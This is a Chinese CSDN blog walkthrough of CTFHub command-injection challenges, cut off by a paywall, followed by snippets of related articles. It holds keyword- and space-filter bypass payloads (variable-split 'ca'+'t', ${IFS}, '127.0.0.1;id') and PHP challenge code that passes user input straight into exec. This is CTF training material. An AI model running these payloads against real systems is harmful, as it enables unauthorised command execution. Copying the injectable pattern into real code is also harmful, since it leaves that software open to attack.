CTFHUB-RCE通关记录以及常见的绕过过滤的方法

最新推荐文章于 2024-03-28 17:47:55 发布
VIP文章 最新推荐文章于 2024-03-28 17:47:55 发布
阅读量2.1k 收藏 10
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/115052023
版权

先过关,再分析相关的防御源代码

1.过滤cat

然后cat 301472130920273.php然后查看网页源代码即可得到flag

 

2.过滤cat

根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx

题目源码:

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/cat/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>CTFHub 命令注入-过滤cat</title>
</head>
<body>

<h1>CTFHub 命令注入-过滤cat</h1>

<form action="#" method="GET">
    <label for="ip">IP : </label><br>
    <input type="text" id="ip" name="ip">
    <input type="submit" value="Ping">
</form>

<hr>

<pre>
<?php
if ($res) {
    print_r($res);
}
?>
</pre>

<?php
show_source(__FILE__);
?>

</body>
</html>

过滤空格

先进行过滤空格总结,在linux环境下进行试验
1:<> 2:< 3:${IFS}

最低0.47元/天 解锁文章
不想当脚本小子的脚本小子
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
于命令执行/注入 以及常见的一些绕过过滤方法
热门推荐
小白渣的博客
02-29 1万+
打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及<?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这...
RCE绕过的简介以及常见绕过方式(个人学习笔记)
2302_80935968的博客
03-28 647
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 2182
RCE(命令执行)总结
RCE绕过键词绕过
Ciyaso的博客
07-23 1459
过滤cat,flag等键词 ①代替 more:一页一页的显示档案内容 less:与 more 类似 head:查看头几行 tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 tail:查看尾几行 nl:显示的时候,顺便输出行号 od:以二进制的方式读取档案内容 vi:一种编辑器,可以查看 vim:一种编辑器,可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 sh /flag 2>%261 //报错出文件内容 ②使用转义符 ca\t /fl\ag
rce总结,绕过手法+危险函数举例
2202_75361164的博客
11-05 779
rce总结,绕过手法+危险函数举例
RCE漏洞详解及绕过总结(全面)
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3000
常见RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
一天一道ctf 第57天(文件描述符 反弹shell)
scrawman的博客
08-19 613
[网鼎杯 2020 白虎组]PicDown 这题目还挺怪的,?url=/flag直接读取是非预期解 正常一步一步做下来是先看/proc/self/cmdline,查看本地使用过的命令,然后/proc/self/cwd/app.py看源码 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask(__n
无参数RCE绕过的详细总结(六种方法
2301_76690905的博客
10-26 2377
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过ctfshow web入门370)
T1ngSh0w的博客
03-30 1288
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
redis-rce:Redis RCE 的几种方法
04-15
redis-rce Redis RCE 的几种方法 文章请参考
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-...
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
XSS从菜鸟到高手,你可能需要这些干货&技巧
MachineGunJoe666
06-03 2254
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
linux find命令 报错 遗漏"-exec"的参数 解决方法
whatday的专栏
01-17 6064
错误示例 find ./jquery-ui/ -name “*svn” -exec rm -rf {}\; 这样写会报错,”find: 遗漏”-exec”的参数” 报错的原因是缺少空格,正确应该是: find ./jquery-ui/ -name “*svn” -exec rm -rf {} \; {} \; 固定写法,三部分组成,大括号+空格+/; linux shell下空格很重要 需要特别注意 ...
命令执行漏洞详解
weixin_42566218的博客
03-08 1万+
一、命令执行漏洞原理 在编写程序的时候,当碰到要执行系统命令来获取一些信息时,就要调用外部命令的函数,比如php中的exec()、system()等,如果这些函数的参数是由用户所提供的,那么恶意用户就可能通过构造命令拼接来执行额外系统命令,比如这样的代码 <?php system("ping -c 1 ".$_GET['ip']); ?> 程序的本意是让用户传入一个ip地址去测试网络连通性,但是由于参数不可控,当我们传入的ip参数为"127.0.0.1;id“时,执行的命令就便成了
ctfhub rce
09-01
CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域特别重要。 请注意,RCE是一种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值